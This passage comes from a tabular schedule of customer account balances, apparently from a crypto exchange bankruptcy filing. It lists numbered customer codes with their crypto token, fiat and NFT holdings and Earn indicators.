| 07385807 | | BCH[0], BTC[0], CUSDT[0], ETH[0.00005200], ETHW[0.00005200], GRT[56.31420207], LINK[1.0836], NFT (373790337882470180/Rox #244)[1], NFT (439306721075819806/Rox #254)[1], NFT (444058918222665846/Rox #247)[1], NFT (498577737475864985/Rox #111)[1], NFT (530741137040894287/Rox #261)[1], NFT (556473704582664543/Rox #276)[1], SOL[2.52234960], SUSHI[0.56547693], TRX[.92048687], UNI[0.03925585], USD[0.81], USDT[0.14418441], YFI[0.00023877] | | |
| 07385809 | | BTC[.00021453], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07385811 | | CUSDT[1], USD[0.01] | | |
| 07385814 | | USD[10.00] | | |
| 07385818 | | BTC[0], DOGE[1], USD[10.00] | | |
| 07385820 | | NFT (374987939075365045/Warriors 75th Anniversary Icon Edition Diamond #1630)[1] | Yes | |
| 07385822 | | USD[10.00] | | |
| 07385826 | | BRZ[1], CUSDT[56.49215372], DOGE[3491.98760087], ETH[.19521908], ETHW[.19500726], SHIB[7383825.84824489], TRX[2], USD[0.00] | Yes | |
| 07385833 | | CUSDT[1], ETH[1.9129737], ETHW[1.9129737], GRT[1], TRX[2], USD[0.01] | | |
| 07385834 | | BRZ[2], CUSDT[1], DOGE[1], GRT[1.00367791], LINK[1.09760495], TRX[1], USD[.55] | Yes | |
| 07385835 | | USD[0.00] | | |
| 07385838 | | BTC[0], DOGE[0.62100534], USD[0.21], USDT[0.00682056] | | |
| 07385841 | | BTC[0.00051116], CUSDT[24], DOGE[2.00000073], ETH[.00000003], ETHW[.00000003], LINK[0.00000135], SOL[0.00000165], SUSHI[0], TRX[5], USD[0.00], USDT[0.00039893] | | |
| 07385842 | | DOGE[141.43085872], USD[0.00] | | |
| 07385845 | | CUSDT[2], TRX[2], USD[0.00] | Yes | |
| 07385847 | | DOGE[0], USD[1.67] | | |
| 07385848 | | BRZ[2], CUSDT[9.75], TRX[2], USD[0.64] | Yes | |
| 07385853 | | GRT[1.93271202], SOL[.139783], TRX[30.77602791], USD[0.00] | | |
| 07385854 | | USD[0.03] | | |
| 07385855 | | CUSDT[1], ETH[.00375848], ETHW[0.92657767], GBP[0.00], KSHIB[15.31041007], LINK[.03660279], MATIC[0], SHIB[1], SOL[.11878429], TRX[21.94453328], UNI[.13732619], USD[0.05] | Yes | |
| 07385856 | | DOGE[4], ETHW[1.01851631], MATIC[101.66901072], SHIB[11], SOL[0], USD[0.34] | Yes | |
| 07385865 | | BTC[.00021045], USD[0.00] | | |
| 07385867 | | CUSDT[2], SHIB[1117942.98490776], USD[0.02] | | |
| 07385869 | | USD[10.00] | | |
| 07385872 | | CUSDT[1], DOGE[175.23792345], USD[0.00] | | |
| 07385876 | | BRZ[1], DOGE[2], ETH[.00493871], ETHW[.00493871], USD[46.13] | | |
| 07385878 | | CUSDT[1], DOGE[.00569502], KSHIB[225.05628094], USD[0.08] | Yes | |
| 07385879 | | USD[0.00] | | |
| 07385880 | | USD[0.00] | | |
| 07385881 | | USD[0.02], USDT[.03285432] | | |
| 07385883 | | DOGE[0], USD[0.00] | | |
| 07385886 | | BTC[.00521184], DOGE[2.00366327], GRT[82.53519121], TRX[1], USD[0.00] | Yes | |
| 07385887 | | USD[10.00] | | |
| 07385888 | | USD[0.00] | | |
| 07385890 | | BRZ[27.5306201], CUSDT[2], USD[0.00] | | |
| 07385891 | | BTC[.0029097], CUSDT[1], DOGE[1], ETH[0.06772244], ETHW[0.06772244], TRX[1], USD[3.00] | | |
| 07385895 | | ETH[0], MATIC[2.00111541], MKR[.00000001], NFT (308483677067069392/Coachella x FTX Weekend 2 #10582)[1], TRX[1], USD[0.00] | Yes | |
| 07385901 | | CUSDT[2], DOGE[567.5958561], TRX[1], USD[0.00] | | |
| 07385904 | | BTC[0.00001292], DOGE[.42668], ETH[.00032737], ETHW[0.00032738], SOL[.0050373], USD[0.01], USDT[0] | | |
| 07385905 | | BRZ[1], USD[0.00] | Yes | |
| 07385909 | | CUSDT[2], ETH[.00260231], ETHW[.00260231], GRT[1], KSHIB[55184.77880573], TRX[1], USD[0.00] | | |
| 07385911 | | LTC[0], USD[55.69] | | |
| 07385931 | | USD[50.18] | | |
| 07385938 | | BRZ[.10627153], CUSDT[2.00209572], DOGE[1], LINK[.00084331], LTC[.00008554], TRX[1], USD[0.01], USDT[0.71539873] | | |
| 07385942 | | BRZ[1], BTC[.00133487], CUSDT[3], DOGE[988.28041911], ETH[.01022355], ETHW[.01022355], LTC[.6798543], SUSHI[1.83411755], USD[0.00] | | |
| 07385943 | | USD[0.00] | | |
| 07385944 | | SOL[20.52945], USD[8.72] | | |
| 07385945 | | USD[10.00] | | |
| 07385948 | | BRZ[10.95072123], CUSDT[41], DAI[.00076106], ETHW[.07039722], GRT[92.1052661], SOL[.00007165], USD[0.00], USDT[0] | Yes | |
| 07385952 | | TRX[1], USD[0.00] | | |
| 07385953 | | DOGE[1], USD[0.00] | Yes | |
| 07385955 | | ETH[0], GRT[.976], USD[0.82], USDT[.665594] | | |
| 07385956 | | CUSDT[1], DOGE[1], USD[161.20] | | |
| 07385959 | | AUD[6.37], BTC[.0034083], CAD[24.56], CUSDT[15], DAI[19.83555], DOGE[3170.11174384], ETH[.05944857], ETHW[.05944857], EUR[16.66], GBP[14.30], GRT[32.33359684], KSHIB[282.63421803], MATIC[12.35167065], SGD[0.00], SHIB[195394.277739], SUSHI[5.06217571], TRX[277.09750002], USD[0.00], USDT[0.00001140] | | |
| 07385960 | | USD[0.00] | Yes | |
| 07385966 | | BTC[0], ETH[0.00000001], GRT[0], MATIC[0], SOL[0], USD[0.00], USDT[0] | Yes | |
| 07385967 | | BTC[.01488732], CUSDT[2], DOGE[2], ETH[1.1301705], ETHW[1.12969578], GRT[1.00290777], LINK[122.27514487], SHIB[9375460.64591629], SOL[6.41972517], SUSHI[27.63773048], USD[0.00] | Yes | |
| 07385969 | | BRZ[1], CUSDT[3], USD[0.00] | | |
| 07385976 | | BRZ[1], BTC[.00134375], DOGE[7], GRT[0], TRX[1], USD[0.00] | | |
| 07385977 | | USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07385993 | | BAT[3.03519096], BRZ[2], BTC[0], DOGE[7.00057537], ETH[0], GRT[5.01656698], KSHIB[0], SHIB[20], SOL[0], TRX[2.00006200], USD[0.00], USDT[47.52690247] | Yes | |
| 07385995 | | SUSHI[.81307173], USD[0.00] | Yes | |
| 07386003 | | BRZ[3], CUSDT[6], DOGE[1], GRT[1], SHIB[4], TRX[172.63891803], USD[0.00] | Yes | |
| 07386004 | | DOGE[0.34675658], KSHIB[.08199482], SHIB[0], SOL[.00199139], USD[0.00], USDT[0] | Yes | |
| 07386005 | | BTC[.0003094], CUSDT[2], DOGE[337.19557944], ETH[.00275721], ETHW[.00275721], GRT[4.67285603], LTC[.03167919], SHIB[323206.20555914], SOL[.53222301], USD[25.00] | | |
| 07386007 | | USD[0.33] | | |
| 07386010 | | DOGE[1], USD[0.00] | Yes | |
| 07386017 | | BRZ[1], CUSDT[3], DOGE[1359.68763138], GRT[2], USD[2.77] | | |
| 07386019 | | BTC[.0002215], DOGE[1], USD[0.00] | | |
| 07386024 | | DOGE[3], SOL[0], TRX[869.02364620], USD[0.00] | | |
| 07386027 | | USD[10.00] | | |
| 07386028 | | CUSDT[58], TRX[3], USD[0.00] | | |
| 07386033 | | BAT[1.00546693], BRZ[6.43398935], CUSDT[6], TRX[2], USD[0.01], USDT[1.08306905] | Yes | |
| 07386035 | | USD[10.00] | | |
| 07386037 | | BTC[.0000421], USD[1.21], USDT[1.89] | | |
| 07386039 | | BAT[1.0165555], BRZ[3], CUSDT[5], DOGE[6102.91725939], ETH[.31200659], ETHW[.31182134], TRX[5725.59950893], USD[0.00] | Yes | |
| 07386040 | | BRZ[5], CUSDT[1], DOGE[13], NFT (569889906333583325/FTX - Off The Grid Miami #6519)[1], TRX[3], USD[0.01] | | |
| 07386041 | | DOGE[0], SHIB[1], USD[0.00] | | |
| 07386048 | | SHIB[1], USD[0.54] | Yes | |
| 07386049 | | DOGE[1], TRX[382.94764761], USD[0.00] | | |
| 07386054 | | USD[121.12] | | |
| 07386057 | | USD[0.00] | | |
| 07386059 | | CUSDT[7], TRX[2], USD[0.00] | Yes | |
| 07386065 | | CUSDT[1], TRX[1], USD[53.51] | Yes | |
| 07386068 | | USD[0.01] | | |
| 07386069 | | NFT (289047858585826295/Bahrain Ticket Stub #1450)[1], NFT (480299206890781964/Entrance Voucher #1909)[1], TRX[160.90619796], USD[0.00] | | |
| 07386070 | | DOGE[1], SHIB[3], TRX[.00213156], USD[0.00], USDT[0.00799134] | Yes | |
| 07386072 | | BAT[4.45383014], BTC[.00021035], DAI[1.9927979], DOGE[27.53893489], GRT[1.98308651], TRX[41.08525045], USD[0.00] | | |
| 07386078 | | BTC[0], DOGE[0], ETH[0], ETHW[0], LTC[0], USD[0.00] | | |
| 07386079 | | TRX[1], USD[0.00], USDT[1] | | |
| 07386085 | | BAT[0], CUSDT[12], DOGE[227.99539558], TRX[1], USD[0.00], USDT[0.00000001] | Yes | |
| 07386086 | | DOGE[.00917262], ETH[0], TRX[1], USD[1.25] | Yes | |
| 07386088 | | BAT[1], BRZ[1], CUSDT[2], DOGE[3], GRT[1], TRX[4], USD[0.00] | | |
| 07386090 | | BCH[0], BTC[0], DAI[0], DOGE[0], ETH[0], ETHW[0], LTC[0], TRX[0], UNI[0], USD[0.06], YFI[0] | Yes | |
| 07386093 | | BRZ[3], CUSDT[6], DOGE[16.4823017], LINK[14.40527725], NFT (564399468079506807/FTX - Off The Grid Miami #1398)[1], SOL[3.54371174], SUSHI[26.84538616], TRX[2], UNI[16.40241339], USD[0.00] | Yes | |
| 07386094 | | USD[10.00] | | |
| 07386097 | | USD[10.00] | | |
| 07386098 | | DOGE[134.89440331], USD[0.00] | | |
| 07386101 | | USD[10.00] | | |
| 07386102 | | CUSDT[1], DOGE[2944.59588308], USD[0.00] | Yes | |
| 07386103 | | BTC[.00021691], USD[0.00] | | |
| 07386104 | | DOGE[137.44342313], USD[0.00] | | |
| 07386105 | | USD[10.00] | | |
| 07386106 | | USD[10.00] | | |
| 07386110 | | USD[1221.56], USDT[0] | Yes | |
| 07386116 | | DOGE[1], USD[0.00] | | |
| 07386120 | | DOGE[.0000665], USD[15.35] | | |
| 07386123 | | CUSDT[1], TRX[2], USD[0.01] | | |
| 07386128 | | USD[0.00] | | |
| 07386129 | Contingent, Unliquidated | CAD[0.00], GBP[0.00], KSHIB[0], MATIC[192.69870981], SHIB[93614578.71189412], SOL[0.00012341], USD[210.60], USDT[0] | Yes | |
| 07386131 | | SHIB[4.75714767], USD[59.64] | Yes | |
| 07386134 | | GRT[4.5375756], USD[0.00] | | |
| 07386138 | | DOGE[139.30264597], USD[0.00] | | |
| 07386139 | | BAT[50.39708028], BRZ[1], CUSDT[1119.53650864], DOGE[1006.95573598], TRX[877.84181452], USD[0.09] | Yes | |
| 07386143 | | BAT[1], BRZ[6], CUSDT[7], DOGE[.03073085], SOL[0.00038891], TRX[8], USD[0.17], USDT[1] | | |
| 07386144 | | CUSDT[1], TRX[1], USD[0.01] | | |
| 07386149 | | TRX[108] | | |
| 07386151 | | BTC[.00136558], CUSDT[2], DOGE[67.99080196], USD[100.11] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07386152 | | BCH[0], BTC[0], CUSDT[1], SUSHI[0.00], USD[0.00] | | |
| 07386153 | | USD[0.00] | | |
| 07386154 | | TRX[.00841299], USD[0.00] | | |
| 07386155 | | BRZ[1], USD[0.01] | | |
| 07386168 | | BRZ[1], CUSDT[2], DOGE[1037.48879619], ETH[.03820191], ETHW[.03820191], SHIB[2116402.11640211], USD[0.00] | | |
| 07386171 | | TRX[1], USD[0.00] | | |
| 07386172 | | USD[10.00] | | |
| 07386176 | | BTC[.00000007], CUSDT[2.10977069], DOGE[11.71659632], USD[0.39] | Yes | |
| 07386177 | | USD[0.00] | | |
| 07386179 | | ETH[.00000073], ETHW[.00000073], SHIB[1], USD[0.00] | Yes | |
| 07386183 | | SOL[.21039395], USD[0.46] | Yes | |
| 07386185 | | BRZ[1], BTC[.00309443], CUSDT[7], DOGE[620.347891], ETH[.00751229], ETHW[.00741646], GRT[11.45645799], KSHIB[430.91108363], LTC[.30205684], TRX[4399.96595405], USD[0.37], YFI[.00155295] | Yes | |
| 07386192 | | BRZ[2], BTC[.02354092], DOGE[2], ETH[.01664922], ETHW[.01664922], SHIB[2], SOL[2.24328851], SUSHI[57.84471399], USD[0.00] | | |
| 07386193 | | USDT[0.00022386] | | |
| 07386194 | | BRZ[1], SHIB[2], TRX[4], USD[0.01], USDT[0.00000001] | | |
| 07386196 | | BCH[.03327037], BTC[.00233233], CUSDT[20], DOGE[393.12759608], ETH[.05962579], ETHW[.05888707], LINK[1.56358821], SOL[1.9083814], TRX[4], USD[0.01] | Yes | |
| 07386197 | | BRZ[1], CUSDT[1], ETH[0], GRT[.00047623], USD[0.00] | | |
| 07386199 | | BAT[0], BCH[0], BRZ[0], BTC[0], CUSDT[518.31586965], DAI[0], DOGE[0], ETH[0], GRT[0], KSHIB[0], LINK[0], LTC[0], MATIC[0], PAXG[0], SHIB[1], SOL[1.01933819], SUSHI[0], TRX[0], UNI[0], USD[0.00] | Yes | |
| 07386200 | | CUSDT[7], DOGE[0], TRX[1], USD[2.90] | | |
| 07386201 | | BRZ[1], USD[0.00] | | |
| 07386206 | | NFT (547733862403288683/Unity #3)[1], USD[0.00] | | |
| 07386207 | | CUSDT[4], SHIB[3246190.04910636], USD[0.00] | | |
| 07386208 | | USD[10.00] | | |
| 07386209 | | LINK[19.2228], USD[1.70] | | |
| 07386212 | | CUSDT[2], TRX[1], USD[1.19] | | |
| 07386223 | | BCH[.00126958], BTC[.00007308], CUSDT[1], DOGE[2], ETH[.00031574], ETHW[.00031574], USD[-1.07] | | |
| 07386226 | | BTC[0], ETH[0], ETHW[0], GRT[0], LINK[0], MATIC[0], SHIB[0], SOL[0.04066080], TRX[1.00001000], UNI[0], USD[35.72], USDT[0.00017508], YFI[0] | Yes | |
| 07386227 | | BRZ[1], CUSDT[1], USD[0.00] | | |
| 07386228 | | DOGE[2], SUSHI[.0462446], USD[2.30] | Yes | |
| 07386231 | | BRZ[1], DOGE[0], SUSHI[0], USD[0.00] | | |
| 07386234 | | BAT[0], BCH[0], BF_POINT[200], BTC[0], DOGE[0], ETH[0], LTC[0.00085432], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07386236 | | USD[0.00] | | |
| 07386240 | | USD[10.00] | | |
| 07386245 | | DOGE[2.86625882], USD[0.00], USDT[0] | | |
| 07386248 | | BTC[0], ETH[0], ETHW[0], NFT (299131755643692607/Vial of Blood)[1], NFT (317071485077949295/Lucky Lemur #3312)[1], NFT (323110107462173591/Moon Water)[1], NFT (323584320417758590/Sapphire Crook #293)[1], NFT (355894257698588807/Angelita Lebsack)[1], NFT (359503801452204452/Crimson Crook #558)[1], NFT (377470386461084447/Goth GF Poster 3)[1], NFT (426470915608585478/Gold Crook #325)[1], NFT (513523826662158258/Goth GF Poster 6)[1], NFT (573229105220433387/Lucky Lemur #3311)[1], SOL[0], TRX[0], USD[2.53] | | |
| 07386249 | | DOGE[1], USD[0.00] | | |
| 07386250 | | CUSDT[1.00004663], USD[0.01] | | |
| 07386256 | | DOGE[.00045381], USD[0.00] | | |
| 07386257 | | USD[0.00] | | |
| 07386258 | | BAT[66.01570013], BRZ[1], CUSDT[12], DOGE[336.11541382], GRT[125.44432968], LINK[1.12301615], SOL[4.04904264], SUSHI[3.82819574], TRX[.00480521], UNI[1.68037781], USD[0.00] | Yes | |
| 07386259 | | BF_POINT[300], CUSDT[2], DOGE[22.91587021], GRT[3.92400862], USD[10.64], USDT[0] | Yes | |
| 07386261 | | ETH[.04140179], ETHW[.04140179], SUSHI[37.05952136], UNI[13.72606058], USD[50.03] | | |
| 07386262 | | DOGE[1], USD[0.00] | | |
| 07386264 | | USD[10.00] | | |
| 07386266 | | NFT (569839445137103571/Entrance Voucher #11156)[1] | | |
| 07386267 | | DOGE[63.79302274], USD[0.00] | | |
| 07386270 | | CUSDT[2], DOGE[452.66679312], USD[0.10] | | |
| 07386277 | | CUSDT[1], DOGE[.00001494], USD[0.00] | | |
| 07386278 | | BRZ[2], CUSDT[3], DOGE[28618.92380703], TRX[4], USD[375.61] | | |
| 07386281 | | BRZ[2], CUSDT[5], DOGE[7.3095907], MATIC[57.67953084], SOL[18.85319231], TRX[1], USD[0.45], USDT[0] | Yes | |
| 07386282 | | CUSDT[6], USD[0.00] | | |
| 07386285 | | BRZ[1], DOGE[17526.17716272], USD[0.00] | | |
| 07386287 | | CUSDT[5195.36627876], TRX[1513.60443538], USD[0.00] | Yes | |
| 07386288 | | BRZ[1], CUSDT[1], TRX[1], USD[243.59] | | |
| 07386292 | | BCH[.00075], BTC[0.00004129], DOGE[.874], USD[1564.89] | | |
| 07386299 | | BRZ[2], BTC[.00027279], CUSDT[8], DOGE[.84137522], USD[0.42] | | |
| 07386305 | | USD[2.55] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07386306 | | NFT (43402847526167677777/#1823)[1], NFT (505606284772956222/Miner Bot 274)[1], USD[0.00] | Yes | |
| 07386307 | | USD[0.00] | | |
| 07386308 | | ETHW[.00003733], SHIB[27.29247623], USD[0.01] | Yes | |
| 07386311 | | BRZ[1], CUSDT[3], DOGE[3], TRX[2], USD[0.00] | Yes | |
| 07386313 | | USD[0.68] | | |
| 07386314 | | USD[10.00] | | |
| 07386316 | | CUSDT[4], DOGE[2], TRX[0], USD[0.01] | | |
| 07386320 | | BTC[.00105326], DOGE[1], USD[0.00] | | |
| 07386321 | | BRZ[1], DOGE[0], ETH[0], GRT[1], TRX[1], USD[0.00] | | |
| 07386325 | | BTC[0], DOGE[1.15630775], ETH[0], KSHIB[0], LTC[0], SHIB[51986405.13549082], SOL[0.00005900], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07386332 | | USD[0.00] | Yes | |
| 07386334 | | USD[0.00] | | |
| 07386335 | | DOGE[1], USD[0.01] | | |
| 07386336 | | USD[10.00] | | |
| 07386338 | | USD[10.00] | | |
| 07386339 | | DOGE[278.55877619], USD[0.00] | | |
| 07386342 | | LTC[.05562246], USD[0.00] | | |
| 07386347 | | BTC[0], DOGE[0], ETH[0], LINK[0], SHIB[1], USD[0.00], USDT[0] | Yes | |
| 07386348 | | CUSDT[1], DOGE[2.10029967], TRX[1.3511891], USD[0.39] | | |
| 07386353 | | CUSDT[3], KSHIB[0], USD[0.00] | Yes | |
| 07386354 | | CUSDT[2], DOGE[686.40046233], USD[0.00] | | |
| 07386356 | | DOGE[0], ETH[0], USD[0.00] | | |
| 07386361 | | USD[0.00] | | |
| 07386362 | | BAT[1.38211820], CUSDT[0.00686653], SOL[0.25055501], UNI[0.00000862], USD[1.89] | Yes | |
| 07386364 | | CUSDT[4674.95866537], DOGE[1], TRX[3680.5120787], USD[0.00] | | |
| 07386369 | | BAT[3.18629123], CUSDT[155.82472853], DOGE[5.06475362], GRT[1], LINK[.08073472], SHIB[1], SUSHI[597.63753981], USD[0.00], USDT[0.00000001] | Yes | |
| 07386371 | | BAT[0], CUSDT[2], DOGE[0], ETH[0], LINK[12.35605256], MATIC[0], SHIB[0], SOL[1.32808588], TRX[1], USD[0.00] | Yes | |
| 07386377 | | CUSDT[1], USD[0.00] | | |
| 07386381 | | BTC[0.00104717], DOGE[0], ETH[0], ETHW[0], LTC[0], SUSHI[0], USD[0.00] | | |
| 07386384 | | DOGE[.00001466], GRT[13.19297952], TRX[1], USD[0.05] | | |
| 07386388 | | CUSDT[1], USD[0.00] | | |
| 07386389 | | DOGE[139.56534575] | | |
| 07386390 | | CUSDT[2], USD[0.00], USDT[1.10614985] | | |
| 07386392 | | AAVE[7.53494795], AVAX[75.91180895], CUSDT[5], DOGE[2], ETH[.00000001], ETHW[129.12649817], GRT[103409.69069005], LINK[165.20336431], MKR[1.59809552], SHIB[1050467783.85672108], SUSHI[1178.81111056], TRX[7], UNI[199.83310703], USD[2873.38], YFI[.18138498] | Yes | |
| 07386394 | | BRZ[1], CUSDT[4], TRX[2], USD[0.01] | | |
| 07386399 | | USD[0.00], USDT[0], YFI[.00000262] | | |
| 07386403 | | DOGE[52.51950113], NFT (441907649748937758/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #94)[1], SHIB[1], TRX[.03817155], USD[0.00] | Yes | |
| 07386404 | | USD[0.00] | | |
| 07386405 | | BTC[0], USD[0.00] | | |
| 07386406 | | BAT[0], BTC[0], DOGE[222.108], ETH[.00000001], LINK[0.08276404], SOL[0], USD[0.00] | | |
| 07386409 | | BTC[.00255778], CUSDT[6], DOGE[202.13133251], ETH[.06884026], ETHW[.06798509], GBP[0.00], SHIB[64524.00340598], TRX[1], USD[0.25] | Yes | |
| 07386410 | | ETH[.00077462], ETHW[0.00077461], SOL[0.00743772] | | |
| 07386412 | | USD[10.00] | | |
| 07386414 | | BRZ[2], CUSDT[4], DOGE[2.83898796], GRT[1], SHIB[3], TRX[5], USD[2198.38], USDT[3], YFI[.00037536] | | |
| 07386416 | | TRX[204.78433547], USD[0.00] | | |
| 07386418 | | DOGE[135.31566437], TRX[504.38790125], USD[0.00] | | |
| 07386424 | | DOGE[67.62397875], USD[0.00] | | |
| 07386429 | | SOL[.00061531], USD[0.00] | Yes | |
| 07386433 | | BRZ[1], BTC[.01936222], CUSDT[1], DOGE[5126.47847704], ETH[1.08637608], ETHW[1.08637608], TRX[4], USD[2130.50] | | |
| 07386434 | | BAT[1.0165550], CUSDT[157.73513539], DOGE[1.00003948], GRT[12.54017683], SUSHI[.95320149], USD[0.00] | Yes | |
| 07386435 | | DOGE[100.66174271], ETH[0], ETHW[0], USD[0.00] | Yes | |
| 07386437 | | SHIB[18986.45340505], USD[0.00] | Yes | |
| 07386438 | | USD[0.00] | | |
| 07386439 | | DOGE[146.53193348], USD[0.00] | | |
| 07386442 | | ETHW[.536], USD[0.00], WBTC[0] | | |
| 07386444 | | NFT (488019987551809237/Coachella x FTX Weekend 1 #18383)[1] | | |
| 07386452 | | USD[10.00] | | |
| 07386453 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07386454 | | USD[0.00] | | |
| 07386455 | | ETHW[.18592738], SHIB[1], USD[679.80], USDT[0] | Yes | |
| 07386459 | | CUSDT[1], DOGE[1659.72072308], GRT[184.24807956], TRX[158.12851714], USD[0.00] | Yes | |
| 07386463 | | BRZ[1], BTC[0.00646077], CUSDT[2], DOGE[4], ETH[0], ETHW[0.53768363], PAXG[0], SHIB[21152841.68253448], TRX[10], USD[695.92] | Yes | |
| 07386466 | | USD[0.00] | | |
| 07386467 | | BTC[0], DOGE[0], ETH[0], LINK[0], SOL[0], USD[0.00] | Yes | |
| 07386469 | | USD[0.03] | | |
| 07386473 | | BTC[.00018017], USD[0.25] | | |
| 07386478 | | CUSDT[1], DOGE[1], GRT[.0000238], TRX[2], USD[0.01] | | |
| 07386482 | | BTC[0.05434967], DOGE[13812.43071168], ETH[0.32454209], ETHW[0.32437337], SHIB[1], USD[0.00], USDT[0] | Yes | |
| 07386483 | | DOGE[1], ETH[0], USD[0.00] | | |
| 07386484 | | CUSDT[1], DOGE[.00035208], USD[0.00] | | |
| 07386488 | | CUSDT[7], DAI[13.1215598], DOGE[116.28386974], GRT[24.38176119], MATIC[23.71297354], SOL[.42600636], TRX[326.17381413], USD[3.30] | Yes | |
| 07386492 | | BAT[1.01655549], BRZ[2], BTC[.00680611], CUSDT[5192.83076163], DOGE[10197.36456675], SOL[3.35010997], TRX[1642.5405656], USD[0.53] | Yes | |
| 07386493 | | BTC[0], LTC[.00267691], SUSHI[.479], USD[0.00] | | |
| 07386495 | | BTC[.00001759], DOGE[1], NFT (302359090483135552/Entrance Voucher #3188)[1], NFT (317192838883068381/GSW Western Conference Finals Commemorative Banner #953)[1], NFT (351821525400502254/GSW Western Conference Finals Commemorative Banner #955)[1], NFT (406779133880368968/GSW Western Conference Finals Commemorative Banner #956)[1], NFT (568889889555877453/GSW Western Conference Finals Commemorative Banner #954)[1], USD[0.00], USDT[1.10817206] | Yes | |
| 07386496 | | DOGE[9.45315583], ETH[0], GRT[1.21358012], USD[-0.24] | | |
| 07386498 | | BTC[0], DOGE[1], USD[0.00] | | |
| 07386499 | | CUSDT[1], DAI[.00001133], DOGE[.00847165], USD[0.00] | | |
| 07386500 | | CUSDT[2], DOGE[0], GRT[1], TRX[0], UNI[0], USD[0.01] | | |
| 07386502 | | BRZ[1], CUSDT[5], DOGE[9.59618666], LTC[.00500642], TRX[34.06423455], USD[1.90] | Yes | |
| 07386506 | | BTC[.00358992], ETH[.18880994], ETHW[.18880994], USD[0.01] | | |
| 07386507 | | CUSDT[1], ETH[.01642365], ETHW[.01642365], USD[0.00] | | |
| 07386510 | | USD[0.00] | | |
| 07386511 | | ETH[.0079887], ETHW[.00789294], USD[0.00] | Yes | |
| 07386514 | | DOGE[1.00165362], TRX[3377.28951421], USD[0.05], USDT[0] | | |
| 07386519 | | DOGE[1], TRX[1129.20048465], USD[0.00] | | |
| 07386520 | | USD[0.00] | | |
| 07386522 | | USD[10.00] | | |
| 07386526 | | BRZ[1], CUSDT[2], DOGE[5], TRX[2], USD[0.00] | Yes | |
| 07386529 | | BTC[0], MATIC[0], TRX[0], USD[0.32], USDT[0] | | |
| 07386530 | | DOGE[.00000001], SHIB[1], USD[0.00] | | |
| 07386533 | | DOGE[1], USD[0.00] | | |
| 07386537 | | BAT[1.0165555], BRZ[3], CUSDT[6], ETH[0], GRT[1.00367791], LTC[0], NFT (350759543308426880/Halloween #4)[1], SHIB[2134769.75300654], TRX[8.00087675], USD[0.00] | Yes | |
| 07386541 | | USD[10.00] | | |
| 07386543 | | DOGE[1], TRX[.00000347], USD[0.70] | | |
| 07386544 | | DOGE[1648.71716818], USD[0.00] | Yes | |
| 07386546 | | USD[10.00] | | |
| 07386548 | | ETH[0], SOL[0], USD[9.99], USDT[0.00002467] | | |
| 07386549 | | DOGE[1], USD[0.33] | | |
| 07386550 | | BTC[.01755943], CUSDT[1], USD[0.00] | | |
| 07386551 | | DOGE[.00396725], GRT[.68623918], SHIB[3], TRX[1.09718736], USD[2464.67], USDT[0] | Yes | |
| 07386552 | | DOGE[17350.22560163], ETH[.54552916], ETHW[.54552916], GRT[2], TRX[867.1294098], USD[0.00], USDT[0] | | |
| 07386553 | | USD[0.00] | | |
| 07386558 | | AAVE[0], BCH[0.00000001], BTC[0], DOGE[0.00000001], ETH[0], NFT (322595997823899704/Warriors 75th Anniversary City Edition Diamond #1415)[1], SUSHI[.00000001], USD[0.00], YFI[0.00000001] | | |
| 07386568 | | DOGE[94.56699381], TRX[95.2482369], USD[0.00] | | |
| 07386573 | | DOGE[150.98813429], USD[0.00] | | |
| 07386575 | | DOGE[1], USD[0.01] | | |
| 07386577 | | CUSDT[9], DOGE[76.01559483], USD[0.00] | Yes | |
| 07386579 | | BRZ[1], DOGE[155.22414368], USD[0.00] | | |
| 07386580 | | BF_POINT[200], USD[0.00] | | |
| 07386581 | | BRZ[2], CUSDT[2], USD[0.00] | Yes | |
| 07386582 | | DOGE[280.56970308], USD[0.00] | | |
| 07386590 | | CUSDT[1], DOGE[7.38016308], ETH[.00000065], ETHW[.00000065], TRX[2], USD[0.00] | Yes | |
| 07386591 | | USD[10.00] | | |
| 07386595 | | BTC[0], ETH[.00000001], KSHIB[6.096], LINK[.088], SUSHI[.3955], TRX[.000001], USD[0.00], USDT[.3368268], WBTC[.00001225], YFI[.0000888] | | |
| 07386597 | | BRZ[4], CUSDT[12], ETH[.01118498], ETHW[.01118498], GRT[1], SHIB[4597713.14942528], TRX[7], USD[0.20] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07386604 | | BAT[.00068008], BRZ[1], CUSDT[1], DOGE[1.00019457], GRT[.46508036], TRX[1], USD[0.01] | | |
| 07386607 | | CUSDT[706.84008433], DOGE[3455.63243595], TRX[161.20781538], USD[0.00] | | |
| 07386608 | | USD[10.00] | | |
| 07386612 | | USD[100.00] | | |
| 07386614 | | USD[2.00] | | |
| 07386616 | | CUSDT[3], LINK[4.33405228], MATIC[259.62183384], SHIB[6402048.65556978], TRX[1915.0048979], USD[0.00] | | |
| 07386617 | | ETH[.10904887], ETHW[.10904887], USD[202.37], USDT[.85652] | | |
| 07386621 | | BAT[5.09832101], BRZ[6.07722196], BTC[2.54638240], CUSDT[15], DOGE[10.01239631], ETH[9.62884661], ETHW[9.62613930], GRT[3], LTC[.00030572], NFT (476769937000560961/Lorenz #1342)[1], SHIB[8], SOL[1.37989257], TRX[20.47460972], UNI[101.0084743], USD[15765.47], USDT[0.00009270] | Yes | |
